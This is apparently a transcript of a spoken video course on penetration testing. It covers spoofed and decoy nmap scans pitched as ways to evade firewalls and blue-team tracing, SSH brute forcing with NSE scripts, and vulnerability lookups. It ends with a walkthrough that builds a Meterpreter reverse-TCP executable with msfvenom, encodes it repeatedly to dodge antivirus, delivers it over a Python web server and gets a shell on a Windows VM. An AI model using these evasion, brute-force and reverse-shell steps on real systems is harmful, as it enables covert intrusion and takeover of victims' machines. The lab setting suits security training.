Okay, simple, I'm gonna spoof this IP address, then I'm gonna scan here. Okay, because this is a trusted guy. Okay, this is a router, no one can able to flag him as a suspicious thing. Okay, because he's a trusted guy. This is a router page, router gateway, so it is easy for me to do the things. See, the simple thing is we are spoofing the IP addresses. Okay, we are spoofing the IP addresses of our connected clients to scan the target system. Okay, this is a simple things which I'm going to explain you. Now there is another way. What we are doing means, see, sometimes whenever we try to scan, there is a about blue team or SOC analysis, you need a knowledge, you need to gain some knowledge about SOC team as well. Okay, the blue teamers, what they do means whenever you just try to scan their server, okay, you are just continuously scanning, or just assume that let me give another example. This is a very good example. Now this is a facebook.com is there. Okay, now in the Facebook, I got the IP address of the Facebook and I am just performing the scanning on that IP. Okay, the Facebook IP, like facebook.com. Okay, I'm just performing the scanning on this domain or IP. At that time what will happen means, first time I can able to see the 6 open ports. Okay, after performing the second scan, I can able to see 1 open port. This will happens. Okay, because here there is a firewall is here. which can able to see, assume that somebody is sending some suspicious packets to this IP, then what will happen means the firewall will automatically block him, so he can't able to scan the server. In the majority of cases, you guys can able to see these things. Okay, if you are a real pen tester, you are working with any company, you can able to see these steps there. Okay, like sometimes we can't able to scan the network there. Okay, due to we are sending a suspicious packets there. Okay, like we are doing some nmap dash o for OS detection. It's a nothing but it's a suspicious commands. Okay, so that's why the server will block you for you can't able to perform the scans there. At that time, what we do means we hide our IP addresses. Okay, now let's take an view of black hat point of view as well. Okay, in the black hat, what will happen means, assume that I am hacking on server illegal. This comes under illegal things. Okay, like black hat hacking. Now just assume that I am hacking, I am just scanning this network, okay, this server by my real IP address, okay, my Kali IP. Now what will happen means this guy, the blue teamer can able to see your IP address there. Okay, yes, they can block you there or they can track you back. Okay, this thing will happen. Okay, because in the Wireshark we can able to see that our local IP is clearly, we guys can able to see the IP there. Okay, our IP and our target IP, the connections, where the connection is coming from, which packets it's sending, we can able to see each and everything. See in the logs, whenever you perform the scanning, all things will be stored in the server in log file. Okay, if the blue teamer analyze the log files there, or SOC analysis analyze the logs file there, he can able to see your IP address. He can able to analyze that where the attack is coming from. Okay, so at that time what we do means we use the decoy. Okay, this is a personally I use this one. Okay, this is previously I just not right now, because whenever you enter in the real world PT, then you can say them that just whitelist my IP address. You can tell them. Okay, it's not a big issue there. Okay, now here see, Nmap offers decoy scanning -d to help users shield their identity. Just focus at this point. Okay, and then but the unlikely idle scan still requires an attacker to send some packets to the target from his real IP address in order to get scan results back. So that's why what we are doing here, we are spoofing the IP address. Okay, a capture does show the that the bulk of the source IP or our decoys. Okay, now let me show you practically how we can able to do this all stuffs. Right, now let's use different IPs to perform the scan. Right, instead of my target IP, I'm gonna see, this is my IP address 183. Now let me use a different IP addresses to perform the scan. Right, now here I just forget it to tell you, mention that it's also known as a stealth scan as well. In the last classes I told you about SYN scan, right? It's also known as a SYN or stealth scan. All right, now let's perform this decoy one. Let me use different IP addresses to perform the scan. Now just type here nmap. Now just type here dash. Let me use the same one. Yes, capital small s and capital S, SYN stealth, and just type here dash capital D for decoy. Now let me use a random. Just type here RND random 7 IP addresses. Okay, it will automatically generate, the nmap will automatically generate the IP addresses. Okay, you no need to mention the IP there. Now simple, just type the target IP here. Okay, now let me open the Wireshark here. All right, if I open this one, now see what is my IP addresses. IP address, let me show you. This is my IP 183. Okay, now see in the nmap it will show the different IP addresses. I am using the 7 IP addresses. You guys can also add. It's totally depend upon you. Okay, now just type here enter. You need to run this as a root. Just type here sudo. Now see, it's using different IP addresses to perform the scanning. You see 190 here. As he told that it will use the IP addresses to get the result, okay? So that's why it's showing my IP address as well. But here you guys can able to see 53 is different IP, 175 is different, 11 is different, 8 is different here. So it's using the different IP addresses. Now here you guys can able to see the result, okay? This is how this is gonna work. Now I want to spoof the IP address. How to spoof that? Okay, now just let me type here net discover. Let me see the connected systems. Let me close this Wireshark here. Now here I got the one IP address, okay? 192.168.133.2 is my router IP. Now simple, let me spoof my IP address to router 1, okay? Now simple, just type here the same command. Instead of RND7, just add here your target IP address, okay? Which you want to spoof. Just type here 192.168.133.2, right? I am spoofing the router IP. Now just type, just let me open the Wireshark here. Let me stop this. Now see, it will show you the here. If I type enter, now see the destination source IP. Now it's scanning my target system to the router IP address. See here. Here is my router IP. It's a kind of, it's a nothing but it's a spoofing attack, okay? Here you guys can also add any IP address, okay? Like first of all, just perform the net discover, then just see the connected clients, just copy the IP address of your connected clients, then perform the scan, okay? See, majority in many cases is can able to avoid the firewalls, okay? So this is how you guys can able to bypass the firewalls, right? Thank you, have a nice day. Now here let's learn about enumeration, okay? Now what is enumeration? Now here you guys can able to see, let me close this one and let me open the terminal, and here let me scan the target IP. Now first of all, before enumeration, let me explain you about aggressive scan. Now see, this is only one flag which can able to perform 3 different scans, okay? Like first it will perform the service version detection and OS detection, okay? OS detection, and also it will perform the script scan, okay? Now see, by using single dash capital A, it can able to perform 3 different scans, okay? We learn about service version detection, we learn about OS, okay? How to identify the OS, right? Now we let's take a look on about this one, script scan. Now let me show you. Now let me show you. First of all, let me perform the service version detection and dash O, and let me perform the script scan as well. Now let me show you the output. Now here you guys can able to see, I can now the output is little bit different, right? Here I just use the script scan, okay? Now I'm gonna cover about what is script scan, each and everything, but just see, by just adding this flag here, I can able to see these things, okay? See, service version detection can able to see the service versions of the services, okay? and the OS dash capital O will show you the operating system here. Okay, operating system. Now this script scan will show you, this SC will show you these things. Okay, like it gonna cover show you the information about ports. Okay, like the services. Now here just see it's used for 3000 TCP ports. The scripts can use the HTTP dash title script, and from here you guys can able to, the simple thing is by using the script scan you guys can able to get more information about the ports. Okay, now here just see I got the more information about the port, like 9200 port is using this one. Okay, HTTP 200 is there, there is a build hash is there. Okay, so this is how by just adding the script scan you guys can able to get more informations about the ports. Okay, now the simple thing is from where you guys can able to see the scripts. Okay, now let me show you the nmap scripts. Okay, if you click on the file system, in the file system there is a user. In user there is a share. In share there is a nmap. From here also again able to navigate to there. Okay, I can also show it from terminal, but let me show you like this. Okay, now here is a nmap. Let me open this. In nmap there is a scripts. See, here are the scripts, right? By using the scripts you guys can able to perform the enumeration. Okay, you guys can also perform the brute force attacks. You can also find the vulnerable things. Okay, now let's perform the enumeration here. How to perform the enumeration? See, let me just type here ls-al to list all hidden items. We use a AL. Okay, now just type here /user. In user there is a share. In share there is a nmap. Okay, nmap. Just type tab here, scripts, and in scripts if I type enter, here you guys can able to see the scripts. See, whenever you just need to up to date your nmap. Okay, because the developer of the nmap will update the scripts. Okay, so just try to update if you are using the older versions. Okay, just apt get update, just do the apt get upgrade there. Okay, now simple. Now let me open the new terminal here and just let me scan for, just type here nmap. Let me perform service version detection. Then let me scan for all ports, all TCP open TCP ports, and let me use a fragment, and also let me perform the SYN scan, SYN and stealth scan, and then okay, that's it. Let me type enter here. Got some error. Okay, sorry for that. Just type here capital what? Capital V. We just need to run this as a sudo. See, here the thing is, sorry, I just forget to explain you this thing. Here, instead of this much command, like instead of this 3 commands, we can also type something like this. Okay, sudo nmap dash aggressive scan. Okay, let me perform the aggressive scan here. That means it will cover these 3 things. Okay, like service version detection, OS detection, and script scan. Just let me show you the output there. Now, what is the IP address? 192.168.133.187. Okay, just wait for the results. Now here you guys can able to see the same results which I just typed here. Okay, but just I can able to see the same results which I did which I typed previously, right? SV-O-SC. See the same results I'm getting. Simple, I just type here. I didn't type this much command. Simple, I just type the dash capital A there. Simple, it will cover all these 3 scans here. Okay, so that's why instead of this much we will use dash A. Okay, it will run the service version detection scan, it will run the OS detection, and also it will run the script scan, right? Okay, let me close this one. Let's go down, and also let me open the still the scan is running. Just wait. Now here I got the results. Okay, now simple, I want to perform enumeration on this specific port. Okay, like there is a SSH service. Okay, by using the scripts. Now let me show you. If I type just take a look here, there is a SSH is there. Okay, now to find scripts related to SSH, simple, just type the same command, ls -la user share nmap scripts. Just add pipe here. After adding the pipe, just type here grep -e, and simple, add the double quote. In between double quotes, just add SSH. Here you guys can able to see the scripts which are related to SSH. Okay, now I want to perform let me use this one. Okay, SSH brute, to perform the brute force attack. Okay, on SSH. Now simple, to use this thing, simple, just type here nmap -dash script is equal. Now I want to use this script here. Okay, and simple, just add here target IP. What is the target IP here? Let me copy the target IP from here. Let me paste it here. Okay, see, you can also perform the SSH. Just let me type here. See, whenever you see this kind of output, at that time, simple, you just need to give space and just type dash capital P small n. Just type enter. That's it. Okay, now here it will start to perform the brute force attack. Okay, see, there are other tools as well. Okay, like Medusa is there, Hydra is there to perform this brute force attack. But by using nmap also, you guys can able to perform the brute force attack, and also you guys can able to perform the enumeration here. Okay, now this is, I just use the brute force scripts, so that's why the brute force attack is going on. So let me use the other scripts as well. Okay, now let me target the HTTP. Okay, HTTP is there. Now simple, let me do one thing. Let me run the normal scan here. Okay, no need to add any kind of flags here. Simple, let me run the normal scan. Simple, service version detection. Let me use this scan. Okay, just let me type the IP address. Just wait for the results. Now here I can able to see the ports. Okay, let me stop this one. Right now, simple, let me do the script scan again. Let me just, instead of SSH, let me target the HTTP. Okay, just type HTTP double quote, just type enter. Now here you guys can able to see the HTTP related scripts. Okay, now there is a HTTP iCloud, find my iPhone is there, uh, just wait, shell shock is there, virus total, there are vulnerables. By using the scripts you guys can able to find the vulnerabilities on your target system. Okay, there is a WordPress enumeration is there, WordPress brute force is there. Okay, there are the thing. Okay, now here there is a one excellent script is there which can able to detect the firewall, that the this port is this HTTP service having the firewall or not. Okay, it gonna detect it. Okay, to use that script, simple just type here the same thing, and let me copy the script name here and simple paste it, just type enter here. See, at the same time also you guys can able to perform this whole script scan. Okay, I'm gonna cover that one as well. It's saying that I think it's it doesn't detected the thing here. Okay, saying the filtered port or something. Okay, no problem. Let me use the another. Now the thing is, see, I want to use the all HTTP scripts at the same time on the same on this IP address. At that time, simple just type here HTTP, just add star here. Then what will happen means it will use the whole scans. Okay, which is related to HTTP. Okay, it will Nmap will use whole scripts which having the HTTP here. Okay, now just type enter. Now it will take a huge time to perform this scan. So maybe it's blocking. Let me go back here. Okay, it's turned off, so that's why the things are working like that. So let me turn it on again. The password is Vagrant. Okay, VAGRANT, right? Okay, right, let's go back here. Let me run the firewall, this HTTP detect WAF. Let me cancel this one. See, if you want to come out from this system, then simple just type here Control plus Alt. Okay, see here there is a mouse. Let me navigate to here. Now let me remove this -pn. Let me execute this script here. It's saying it's blocking. Okay. Here you guys can able to see 992 filter ports, OS system. Where is the HTTP here? HTTP proxy. I think it doesn't detected the firewall here. Okay. Okay, no problem. Let me run this all HTTP scripts at the same time. Now let's go back here. Now there is a Apache is there. Okay. Now let me find any scripts. Let me find any Nmap scripts related to Apache. Now just wait. Let me stop the scan because it will take a huge time. Now let me scan for this one, Apache. Okay, just type enter. No scripts are there which is related to Apache, right? Now if there is any script related to Java, uh, it's not. Let me scan it again because it's only showing it doesn't showing some ports. Okay, so that's why let me scan it again. Just let me run the normal scan here. Now still I can able to see this much ports only. I don't know why, but okay. No, let me add this one to avoid ping pn. Still okay, no problem. Let me perform the about this one. WAP is here. There is a no scripts related to this one. Let me use the SSH only. Now there is a, let me execute. Let me run this all SSH scripts at the same time. Just type SSH and just type star here. All right. Now see, first it's trying to perform the brute force attack. See, yes, I can able to see that the some ports are missing here. So simple thing is I need to restart this system. Maybe due to some problem, it can some errors or something. It can't able to show some ports here. Okay, so no problem. So this is how you guys can able to perform the enumeration. Okay, basically enumeration is very important in our PT. Okay, without enumeration we can't able to perform anything. Sometimes what will happen means here you can't able to see the version details or service version detections at sometimes. Okay, let me show you here. See here it's showing that unknown. Here it can't able to detect the port. Okay, the version. So it will do like this. Okay, in the nmap whenever you perform the scanning, it can't able to show you some versions. At that time what we do means we perform the enumeration there. Okay, to find more about that service. Okay, to get more information about that specific service. If first it's gonna perform the brute force attack, then I don't know which. Just let me stop this one. So such, let me use this one. Okay, now here you guys can able to see the details about the SSH. Here you guys can able to see Kex algorithm is here. Okay, and here there is a something open SSH poly 1305 @openssh.com. Here you guys can able to see some informations. Okay, about the SSH. Whenever you perform this enumeration, then you guys can able to gather more information about the specific port or specific service. Again I am saying this thing, right? So enumeration is very important. Now let's learn about vulnerability scan. Okay, how you can able to perform the vulnerability scan using nmap. Now here you guys can able to learn more about this one. Now here in the description, the NSC scripts uses info about known services to provide data on vulnerabilities. Note that is already included in the standard nmap NSC library. So we need to we no need to install this one. Simple, we can easily run this one. Okay, but the thing is here, now it can actually be run without ASV. See, let me show you. You can also install this one, but no need to install it. See, keep in mind that the scripts depend on having information about software versions, so it only work with -sv flag. Now how you guys can able to run this vulnerability script? Okay, uh, to target, just let me, okay, here it is. This is the regex. Okay, simple, let me run like this. Okay, now simple, just type here nmap. Let me copy my target IP here. All right, now simple, first of all just type here sudo nmap, just type here sv dash s service version detection. Okay, just sv there, and just mention your target IP. But before typing the target IP, just type here dash script and give space and just type here vulners. Okay, like this. Okay, now just type enter. Now it will ask for the password, just type the password. Now you need to wait. Okay, this thing comes under vulnerability assessment. Okay, uh, because we are using the scripts to find the what vulnerable things. Okay, vulnerable services. So the simple thing is you guys can able to perform the whole almost 80 to 90 percent of vulnerability assessment using nmap. Okay, but the company uses the different software such as nessus, nexpose. Okay, so whenever you just enter in any field, okay, any vulnerability assessment field, then just try to use the nessus or nexpose. It is very easy to use. I'm gonna create one different course upon about this nessus or nexpose. Okay, how you guys can able to perform vulnerability scanning, sorry, vulnerability assessment using this nessus. So you no need to worry, but simple, just focus here first. So here are the results. See, here you guys can able to see the huge results are there. Okay, like 22 TCP port is vulnerable. Okay, like this is the exploit, and here this is a CV code. Here you guys can able to see, if you copy this CV, you can also say it as a CV ID. Okay, now let me copy this CV ID here and let me paste it here, right? So you guys can able to learn more about that, about this vulnerability. So here it is. See, hyperlinks are there. If you open this links, then you guys can able to see the way to exploit that vulnerability. Okay, now here there are some links. Let me copy that links here. See, again I am saying nmap is a very excellent tool. Okay, so here is a exploit code. By using this, you guys can able to exploit the things. Okay, now what is CV? CV is nothing but common vulnerability exposure. Now basically there is a 1337 day ID is there. If you want to learn about that exploit, here it will provide the links as well. By visiting these links, you guys can able to learn about that exploits. Okay, now in the real world scenarios, you guys can also search like this, or you can also use a metasploit to exploit these things. Okay, this vulnerabilities. So let me copy here. There is a 3000 TCP port is here. Here is exploits. See, in the exploit DB, see, first of all let me tell you everything. Sometimes it's contain the information. Okay, sometimes it's contain the exploit with the exploit. Okay, don't think that whenever you see like the CV, that means you guys can able to get the exploit. Okay, so it's not like that. Sometimes you guys can able to get the information as well. Okay, if I open this one, this link, see here it's using the exploit DB. Okay, let me copy and let me paste it here. Okay, sorry, copy link. So here is a exploit. But in real world, what will happen means whenever we perform vulnerability assessment about the on printers, or sometimes at that time what we can able to see means only informations, we can't able to see the exploits there. Okay, so just try to, you just need to check this, okay, manually. So I'm gonna teach you how you guys can also exploit this vulnerabilities. Okay, so simple copy and paste it here. And also you guys can also just type like this, copy like this, and let me paste it on here. Paste and just type. So it's having the CVSS score is 7.5. Gain access is none here. Uh, so here it's showing like it's a eternal blue vulnerability. So I'm gonna teach you how you guys can able to exploit this. Okay, so here is the thing. Okay, how you guys can able to exploit the vulnerability. So you no need to worry, I'm gonna cover this all steps. Okay, right. So the thing, the main thing is how you guys can able to perform the vulnerability scan using Nmap. Okay, simple. Just you just need to type this command. Remember, you just need to add this flag. Okay, you just need to add the service version detection flag here. Then just add the -j scripts and just add vulners here and target IP address. Okay, that's it. In this class, we will learn about Metasploit. Okay. Now let me open the terminal. Okay. Let me show you from here only. Just open the file manager. Just click on the file system. Click on user. Click on share. See, by using Metasploit, you guys can able to perform whole penetration testing. Okay. Now simple. Just type here Metasploit. Here you guys can able to see Metasploit framework. Let me open it. See, here you guys can able to see some folders, files are there. Okay, to update this you just need to run this MSF update, because update is very important. Okay, and here you guys can able to see the modules. In the whole training we are focusing about modules. Okay, if you click on the modules here, you guys can able to see the auxiliary, encoders, evasion, exploit, nopes, payloads, post. See, auxiliary is useful for scanning. Okay, I'm gonna teach you how you guys can able to use this all stuffs. And there is a encoders is useful to bypass the antiviruses. Evasion is the same thing. Okay, to bypass these things. Okay, like antiviruses, to bypass the defender. Okay, like that. And there are the exploits. See, in this exploit here, you guys can able to find, assume that if you want to target the Android device. Okay, if you want to hack the Android device at that time, simple, you just need to use this one. Okay, if you type here exploits / Android, here you guys can able to see the exploits for Android. Like in browser there is a browser exploit. Okay, file format, local. If you want to target the iPhone at the time, simple, just here is OS X is there. Okay, browser exploit, email exploit, FTP exploit. Okay, HTTP exploit. And if you want to target the Windows system, then in this classes we are learning about Windows, right? Here are the exploits to target the Windows systems. Okay, now there is an antivirus folder is there. Okay, so we will use this all stuffs. Okay, like how you guys can able to use this all exploits. Assume that you are targeting other systems at that time, how you guys can able to do that. Okay, you will learn this all stuffs here. Okay, now The second thing is there is a nops, payloads, okay, and post. Now, see, if you are running Metasploit for first time on your Linux system, at that time, simple. First of all, just type here before running or before starting Metasploit, just type here sudo systemctl start PostgreSQL. Just type enter. Then just type here msfdb. Here you guys can able to see MSF. You can use the specific port number for the PostgreSQL connection settings. You no need to just no need to focus this one. Here there is a msfdb init is here to start and initialize the database. First of all, just copy this one and just type sudo and just initiate the database here. Okay, just type enter. Database is started. Then you can just type here clear and just type msf console to start Metasploit. So here is 2264 exploits out there, 1189 auxiliaries out there, 404 posts out there, okay, 951 payloads, 45 encoders, 11 knobs, 9 evasions. Now simple, just see, I want to target SSH service. Simple. First of all, just type here help. Here you guys can able to see the things, okay. This is if you type the question tab, then also you guys can able to see this output, okay, the help output. There is a banner, display an awesome Metasploit banner, cd to change the directory here, okay, advanced, back, favorite, info, okay, kill a job. So you will learn this all steps, but here many commands and options that take a list of things can use ranges to avoid having to manually list each desired things. Now the simple thing is, see here the terminal to terminate this first session, you just need to type like this, stop some extra running jobs, okay, just leave it. Now simple the thing is, assume that I want to target, I want to find the exploits and auxiliaries for SSH. Simple, just type here search SSH. Here you guys can able to find the things, okay. Now here there is a exploit, basically it's exploit, and here you guys can also see the description as well, okay. It's a nothing but it's a remote code execution, and here there is a auxiliary is there for a scanner. See, auxiliary scanners SSH, okay. And the main thing here is you just need to check the ranks as well, okay. Ranks, see if there is a excellent, then it's excellent, okay. If there is a normal, it's a normal one, okay. So again I just told you, right, auxiliary is nothing but it's a scanners, okay. Exploits are nothing but to exploit the vulnerability, okay. By using this you guys can able to exploit the specific vulnerability, okay. So here are the things are there, okay. Now assume that I want to search for Windows, okay. Just let me type here Windows. Here you guys can able to see the Windows exploits, okay. Windows exploits, payloads, okay. So here is the thing, assume that I want to search for Android, only about Android, just type here search Android, okay. So here you guys can able to see the for Androids. Okay, exploit Android file format. There is a, this is a nothing but it's exploit. Okay, uh, see, assume that if your victim is using the Adobe Reader PDF, then by using this exploit, you guys can able to exploit him. The bad thing about the exploit is, assume that in the victim system, victim Android device, Adobe Reader is not there. Then what will happen means you can't able to exploit him. Okay, it's basically it's depend upon the softwares. Okay, and as you, there is a exploit, all winner backdoor is there, escalation. There is a ADB server exec is there. Okay, basically these are the payloads. Okay, like a malicious APKs. Okay, like by generating, I'm gonna show you this one as well. Okay, just check out our Android hacking beginner series on Udemy. I just covered each and everything about how you guys can able to hack the Android device. It's for beginners. Okay, so this is a thing, right? Now assume that in this classes we are targeting the Windows, right? So simple, just type here show Windows. Again, let me type this. Sorry, search Windows. Here there is a Windows. Okay, assume that, let me use this one, exploit, or okay, let me use any of this one. See, auxiliary DOS Windows FTP is there. Now just see the number here. Okay, if you want to use this module, simple, just type here, just remember the number there. Okay, what is the number? I just forget it, man, where it is. Okay, let me use this one, FTP Wing FTP admin exec. Now the number is 2268. Okay, just copy this number and simple, just type here use and paste the number there. Okay, enter. Now you are using this one, this exploits. Now just type here show options. Here you just need to set up the options. Okay, now you just need to see here there is a required things. If something is required, here it will write the yes. Okay, yes, that means these things are required. Now here there is a no, that means the things are not required. Okay, if you doesn't specify this one also, it will work. Okay, now the main things here are username, rhost. Okay, rhost is nothing but target host, then proxy. Proxy is not necessary here, and the password is necessary. Okay, to authenticate. So this is how the things are working here. Okay, don't worry if you're not getting this. Whenever we enter in practical thing, then you will get each and everything. Okay, you will learn each and every stuff here. Right, thank you, have a nice day. By using MSF Venom, you guys can able to generate the payloads. Like let me show you. Here is MSF Venom. Like see, you guys can able to generate payload for specific platforms. Okay, now let me tell you, there is a MSF Venom, there is a MSF console. Now what is MSF console here? By using MSF console, you guys can able to listen for the connections in a frank words. Okay, assume that we just generated the payload and we just send it to the victim and he just executed that on that system. After executing the payload, we want to listen the things. Okay, for connection, at that time we use the MSF console here. Okay, don't worry, you will get all these things. Okay, what I am trying to say here, whenever when we enter in this field, in the practical field, you will get all this stuffs. Okay, now the simple thing is, let me open the terminal and just type here MSF Venom -h. Here you guys can able to see the list, payload, list option, format, like in which format if you want to generate the payload. Like if you want to generate the payload in exe format or any other format, or in Python, or like per or something. Okay, now here there is a encoders. In this classes we are focusing on the encoders. Why? By using encoders we can able to bypass the antiviruses. Okay, now there is a bad characters are there here, the bad characters to avoid. You guys can able to avoid the bad characters from your payload. Okay, now the simple thing is, there is a iterations or there the number of times to encode the payload. See, this is a very important thing, like iteration. Like by using this iteration, see the number of times to encode the payload. Now assume that I just generated the payload. Okay, I want to encrypt that payload for 15 times. Okay, whenever see, assume that we increase the times of encoding there, that means it is easy for us to bypass the antiviruses. Okay, it's work very fine. Okay, now the thing is, let's generate let's first of all, let's go back to our Chrome, and here you guys can just type the MSF Phenom cheat sheet GitHub. Sorry, I just typed the wrong spelling there. Okay, now there is a single page. From here you guys can able to see the cheat sheet. Now assume that if you want to generate the payload in the PHP, then simple, just add like this. Okay, now if you, now the main thing is we are only focusing on the exe one. Okay, and here is the exe. No, I'm gonna show you this all stuffs. Okay, now let's go back and let's learn about encoders. Why? Because encoders are very important in our case. Now just type here MSF Phenom dash list encoders. Here you guys can able to see the list. Just wait. Now there is there are the encoders. Okay, like by using CMD, it can able to there is a bash brass expansion command coder. There is a generic carrier. Okay, now first of all you just need to focus on the rank. Okay, why? See, whenever the rank here is low, right, that means it can be detectable. Okay, now here there is a great is there. Okay, PHP base 64 one is great. Okay, now why we are only targeting in this classes, we are focusing on the format of exe. Okay, because our Windows is exe. Okay, and this is a Windows penetration testing training, so let's only focus on the this basic stuffs first. Okay, let's then we will move to some advanced stuffs there. Okay, now here the thing is there is a the majority of people use this one. Okay, Shigataka knife, which is very like popular one. Okay, this here you guys can able to see excellent. Okay, now if you want to generate the payload by using the encoders, here there is a command. Okay, now MSF Phenom dash P for the platform. Okay, assume that if we are just getting the Windows system, then simple add the Windows here, and let's use the reverse shell TCP. Okay, like this. Okay, now let's go back and let me open the another sheet here. I think this is the same thing. Okay, so here is the web payloads, Windows payloads. Now we just need to focus on the Windows payloads. Okay, like there is a we just see the encoders here. Okay, now he sorry guys, there is a IP port. Now let's generate a payload. Okay, a normal payload. Now in this payload we gonna use encoders. Okay, like we gonna use the Shigataka Nai, and then we will use the this one bad characters. Okay, and here the bad characters are these are the by default one. Okay, let's generate the encoded payload. Okay, so don't worry, right now I am generating the encoded payload. Okay, I'm gonna teach you how to generate a normal payload as well. It's just a basic classes how the things are working. This is only for the idea purpose. Okay, so you no need to worry here. By watching the videos after some time, okay, you will get each and everything what I am doing here, and also you guys can also perform the PT there. Okay, by watching this whole course, right? Now simple, the thing is we are right now we are generating the encoded payload. Okay, basically by using this encoded payload we can able to bypass the antiviruses. Okay, now see, this is a Metasploit. Okay, this is an open source one. If you generate the encoded payload, then also the antiviruses will detect it. Okay, so we will use some other softwares to bypass the this antiviruses. Okay, so you no need to worry, I'm gonna cover that one too, but here this is a basic things. Okay, so that's why I'm showing you. See, by using the let me tell you, by using this by encryption method, you guys can able to sorry guys, you guys can able to bypass the antiviruses in older versions of Windows devices. Right now my target is Windows 7. I'm gonna target the Windows 10 as well. See, the for Windows 10 and 11 the process is same. Okay, you no need to worry here. So let me target the right now in this classes, let me target the Windows 7 And let me see, is there Windows 10 is there? Okay, Windows 10 is there. I'm gonna target that one too. Okay, so you no need to worry. Now simple, to generate the encoded payload, simple, just type here msf venom -p Windows meterpreter reverse TCP. Now the simple thing is here, sorry guys, I am using the reverse TCP. You can also use the reverse HTTP, but TCP is good for us. Okay, for beginners to learn something, this is a good for us. Okay, this TCP. Okay, see, for this you need to learn a little bit about networking. Okay, what is TCP, what is HTTP, what is HTTPS, what is FTP. If you learn basic about networking, then it is easy for you. If you don't want to learn, or you don't have that much time to learn the stuffs, so don't worry, just try to do the practice. Okay, in my case, when I am in beginning, okay, for me, I didn't learn the networking first, okay, because I want to hack something. Then after hacking the things, I thought let's learn some more, okay. So at that time, after hacking something, I learned the stuffs, okay, like what is TCP, HTTP, FTP, okay, each and everything, okay. So first of all, if you are a beginner, then first focus on hacking, just hack some systems, okay, hack some VMs, okay. After that, just try to learn about networking, okay. I did this process, okay. Majority of people will think that why you did like that, because I need to focus in cyber security, right? First, if I learn about ethical hacking, this stuffs, then it is easy for me to learn networking, okay. Assume that the instructor in YouTube or somewhere, he's just saying about TCP, then in my mind, I the flag will it's like a flag to me, like if whenever he's just say about TCP, then I'm gonna remember this payload, okay. Okay, at that time I just use the TCP stuffs, okay. This is how it's gonna work, okay, for me. I don't know about you, okay. Now the simple thing is, here I am using the TCP localhost. I just told you about the localhost. Localhost is nothing but my Kali Linux IP address. In the real world, what will happen means they will provide you a jump server or VPS or some other stuffs, okay. So at that time, I just told you how you guys can scan the IP addresses. Just add the IP there. See, I am saying each and every time this one, okay. In the last classes also I told you, but still I am explaining this stuffs, okay. Now L port, you guys can use any port, but if you are working as a red teamer or something, then you need to worry about this stuffs, okay. For beginners, you no need to worry. Just see here, L port. Right now I am using the by default port of Metasploit 444444 -F for format exe, -E for encode. I am using the Shikataga 9 here, and I am just using the -A. What is -A? I just told you in the last classes. Iteration is nothing but whenever we increase these stuffs, then what will happen means, we assume that I just added 10 here. At that time, it will encrypt the payload for 10 times, okay. Then it is useful to bypass antiviruses, okay. If you play with these stuffs, and if you guys play with these bad characters, then by using this MSF Venom also, you guys can able to bypass the antiviruses, okay. This is the thing, okay, right. Now let me generate, this is a nothing but this is for output, okay. After generating the payload, it need to be saved with the name of shika.exe, okay. Just type enter here. Now here you guys can able to see the payload has been generated. Let me open the file manager, click on Kali. Here is a shika.exe has been generated. Now simple, let me increase the iteration here, okay. Just let me add here 15. Let me encode this payload for 15 times, okay. Now it will take some time. Just see the file size here, 73802, right? See here, the same size is there, but it's encoded the stuffs for 15 times, okay. See, it's calculating from where 0, okay, 0 1 2 3 4 until 14. That means it's encoded for 15 times, okay. Now I just uses the just let me show you. Okay, this is how this gonna work. Okay, now let me do one thing. Just let me hack this system. Okay, now let me show you. This is an encrypted one. Okay, how to generate a normal payload. Now let me show you that one as well. Okay, this is an encrypted one. We are using this encrypted payload. Okay, whenever you see this dash e, that means you are generating the encoded payload here. Remember this thing. Okay, now let me generate a normal payload. Okay, to generate a normal payload, simple. This is a very simple command. Just type here msf venom. Okay, dash p for payload. Let me generate the payload windows. Sorry, windows meter peter. The same thing. Lhost, lport. Okay, exe. Sorry. Let me output this one with the name of normal dot exe. This is a nothing but this is a normal payload. Okay, if you send this to any system, okay, it will be detectable. Okay, according to me, maybe the Windows 7 won't detect that one. Just let me see that as well. Okay, now here is a normal payload. This is a encrypted payload. See, we just generated the payload, right? Before sending this payloads to our victim, we just need to listen for connection first. Okay, now how to listen for this connection? Okay, now the simple thing is you just need to use a msf console. Okay, just type clear here and just type the msf console. Now simple here, you just need to type here, let me zoom this one. Okay, use exploit / multi / handler. Okay, now just type enter. Right, see guys, whenever we are exploiting something. Okay, right now in our case we are exploiting the Windows system or Linux, any system. Okay, at that time we use the exploit here. Don't worry, we'll get this all stuffs. Okay, now simple, the thing is, now let's set the payload here. Set payload. Okay, which payload I just used here in the last classes. Let me open the terminal. See, I know which payload I just used. This one. Okay, Windows meter reverse TCP. Simple, let me copy that and let me paste it here. Okay, you guys can also type that stuff there. Okay, now just type enter. Now simple, just type here show options. Here the options which we need is lhost, lport. Okay, now the lhost is, what is the lhost here? Our Kali Linux IP address. Okay, just type here set lhost, and what is the IP of my Linux? This one. Okay, just let me copy it. Let me paste it here. Now the L port is same by default. The by default 4444 port we just used to generate the payload. Okay, simple, no need to change this one. Simple, just type here exploit. Okay, it's waiting for the connection. Now simple, let's go back here and just open the terminal here. Just type here sudo python, because see, we can also drag and drop this thing in our target system, but it doesn't have the VM tools for Windows 7. Okay, so that's why I'm using the Python server to move these files on my target system. See, I'm gonna teach you how you guys can also target the things here. Right now, again, I am saying it's a basic classes. So I'm doing this process here. Okay, like simple sharing stuffs. Now just type here python -m. Now just type here simple HTTP server. Let me listen for on the port 80. Okay, HTTP port. Okay, I just need to download this one. Just type here pip install. Just type enter. Let me install this module here. So let me just type this one. Okay, python 3 -m http dot server. Okay, it's use the port 8000 here by default. Now let's go back to my target system. Let me open the Chrome. And what is my IP address? 192 point the Kali Linux IP 168 point. I just forget it, that one. 133.183. Just type the port there. The port is what? I think 8000. Yes, 8000. Now just type enter here. Now here you guys can able to see the list. Now this is a normal payload. Okay, see it's showing like it's a dangerous one. Now there is another payload, the name of shika.exe. Chrome is blocking this one. If I open this on my here, just see what will happen. Say it's showing this types of file could be harmful. We will change the extension each and everything, so you no need to worry here. Now let me show you how the connection will work each and everything. Keep. Let me see the firewall is here is a firewall. Sorry, just type here defender. Right, show in folder. See, if I use a normal payload, then what will happen means I will get the administrator access. Okay, like just let me execute the normal payload. Just type here run. If you go back here you guys can able to see on Metasploit you got the connection here. Okay, that means you successfully hacked the Windows 7 system. So yeah, same payload, just send it to the Windows 10 or 11, it will work. Okay, but what will happen means if you execute this one like this, assume that the victim double click this one, at that time what will happen means automatically defender will delete that one. Okay, like this is a Chrome security. You just see here something like just see if I click on download this one, then it's a nothing but it's a Chrome security. Okay, it's not a Windows Defender security or antivirus 